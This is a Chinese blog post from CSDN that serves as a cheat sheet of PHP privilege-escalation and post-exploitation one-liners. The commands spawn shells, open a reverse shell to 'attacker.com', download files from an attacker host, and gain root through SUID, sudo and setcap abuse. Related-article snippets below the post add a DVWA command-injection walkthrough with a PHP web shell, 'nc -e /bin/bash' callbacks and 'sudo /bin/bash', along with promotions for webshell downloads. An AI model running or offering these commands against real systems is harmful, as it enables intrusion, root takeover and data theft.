PHP提权姿势

最新推荐文章于 2024-03-19 09:44:04 发布
最新推荐文章于 2024-03-19 09:44:04 发布
阅读量2.9k 收藏 25
点赞数 8
分类专栏: 提权 文章标签: php shell 提权 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45924653/article/details/108466845
版权

Shell

export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'

export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));'

export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));'

export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'

export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

Command

export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'

Reverse Shell

目标机

nc -lp 4444

export RHOST=attacker.com
export RPORT=4444
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'

File upload

php version5.4或以上

LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT

File download

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

SUID

sudo sh -c 'cp $(which php) .; chmod +s ./php'

CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"

Sudo

CMD="/bin/sh"
sudo php -r "system('$CMD');"

Capabilities

cp $(which php) .
sudo setcap cap_setuid+ep php

CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');"

人生漫漫其修远兮,网安无止境。
一同前行,加油!

c7ay.
关注
  • 8
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
udf提权PHP代码
10-30
udf提权PHP代码
php服务器提权,服务器提权
weixin_27945229的博客
03-13 462
当拿到WebShell 之后,下⼀步⼲什么?权限提升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的权限,以期望从其他账户访问敏感信息,甚⾄获得对整个系统的完全管理控制。当攻击者以这种⽅式扩⼤其最初的未经授权访问的权限时,将其⾏为称为权限提升攻击。简单来说,就是获取⽐最初更多的权限,甚⾄系统权限。⽔平权限提升(越权)我们假设攻击者已经获得...
php提权,一次实战提权
weixin_39996096的博客
03-10 1160
原标题:一次实战提权闲来没事,朋友发给我一个站,需要提权,然后那就试试吧,于是就有了接下来的文章,大牛勿喷https://xxxxxx/……/Abstract.aspx(地址不方便公布)猜测:已经上了一个aspx的大马,看来支持aspx那就可能有mssql环境,可能开放了1433,待会可以利用sa提权等等有关mssql的提权方法: 然后打开访问看看: 熟悉的界面,那我们先来搜集一下基本信息: 从这...
【靶机测试--PHOTOGRAPHER: 1【php提权】】
最新发布
qq_74240553的博客
03-19 857
vulnhub靶机
PHP最高权限的获取
dgnankai的专栏
08-04 807
默认情况下,php启动后,权限仅仅属于www组的,它无权改动别的用户创建的恶目录、文件。如果我们需要强制操作,系统就会报错,操作无法成功。 这是可以将PHP改为root组,这样就可以解决如上问题。当然请大家注意网络安全,因为网站一旦被黑,整个系统就会沦陷。 环境:CentOS7、宝塔面板、nginx、php4.7...
初涉内网,提权那些事
xxxxxibdrgn的博客
11-03 817
对于内核提权就写到这啦 整体看下来应该都会有一个比较清楚的认知吧 不懂的话多看几遍 相对来说是写的比较详细的了。关于内网还有很多需要学习的知识 像提权后的权限维持、横向移动、后渗透、痕迹清理、不同平台的不同方式提权、以及进阶的域渗透。后期有空了会更新有关内容的文章。学海无涯,希望大家每天都能学到新知识提升自己,学到的东西可不要做非法的事哈!!!!个人博客链接: https://webgotd.com。
【权限提升】六种数据库提权&口令获取
今天是几号的博客
02-15 1594
MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权至DBA,并以oracle实例运行的权限执行操作系统命令。绑定需要访问数据库的IP。
菜刀php提权,当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令...
weixin_39622399的博客
03-19 413
/*==============*/error_reporting(0);ini_set('max_execution_time',0);// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------/**************...
php提权脚本
05-03
php提权脚本
提权技术详解.pptx
09-03
提权技术详解】 提权技术,通常在网络安全领域中被提及,指的是攻击者通过获取系统中的较低权限,然后利用漏洞或策略缺陷提升自身权限,最终达到控制系统或获取敏感信息的目的。提权技术涵盖多种技术和策略,包括...
PHPwebshell提权源码
08-07
PHPwebshell提权源码 集合控制台 网路 链接 账户 打包 修改文件
超强php提权大马!过免杀代码
06-14
超强php提权大马!过免杀 代码
PHP入侵+提权拿服务器.rar
12-03
PHP入侵+提权拿服务器.rarPHP入侵+提权拿服务器.rar
PHP提权功能强大的大马。星外提权。使用时最好修改一下自己的密码。
09-11
提权功能强大,星外 PHP提权功能强大的大马。星外提权。使用时最好修改一下自己的密码。
su 提权 php
08-29
拿下shell 干什么
php 提权脚本 linux,linux 自动提权perl脚本
weixin_39518840的博客
04-02 540
使用demoyaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O root.plyaseng@UAUC:~$ perl root.plyaseng@UAUC#:help----------------------------------------------------...
php提权教程,thinkphp 5.x版本代码执行可直接提权getshell
weixin_39647412的博客
03-10 1472
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。影响范围5.x < 5.1.31, <= 5.0.23漏洞分析Thinkphp v5.0.x补丁地址: htt...
php用户提权root,CVE-2017-9841到root提权
weixin_33539366的博客
03-20 492
简单来说漏洞是出在phpunit,可以使用composer安装,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, 这个文件可以造成RCE:$curl--data"
jsp\php\asp\aspx不同脚本webshell的权限
m0_62172162的博客
04-25 287
jsp\php\asp\aspx不同脚本拿到的webshell的权限不同
dvwa命令注入提权
12-05
根据提供的引用内容,dvwa命令注入提权的思路如下: 1.尝试写入一个php文件,可以使用如下命令: ``` echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php ``` 这个命令会在/var/www/html/目录下写入一个名为cmd.php的文件,其中的system($_GET["cmd"])可以执行GET请求中的cmd参数所对应的命令。 2.连接菜刀,使用如下命令: ``` nc -nvlp 4444 ``` 这个命令会在本地监听4444端口,等待菜刀连接。 3.在DVWA的命令注入页面中,输入如下命令: ``` & cmd=nc -e /bin/bash 你的IP地址 4444 & ``` 其中,你的IP地址需要替换成你本地的IP地址。这个命令会在目标机器上执行nc命令,将shell连接回你的本地机器。 4.在菜刀中连接目标机器,即可获得一个shell,使用whoami命令查看当前用户,如果是www-data,则可以使用如下命令提权: ``` sudo -l ``` 这个命令会列出当前用户可以使用sudo命令执行的命令。 5.如果当前用户可以使用sudo执行任意命令,则可以使用如下命令提权: ``` sudo /bin/bash ``` 这个命令会以root权限打开一个新的shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值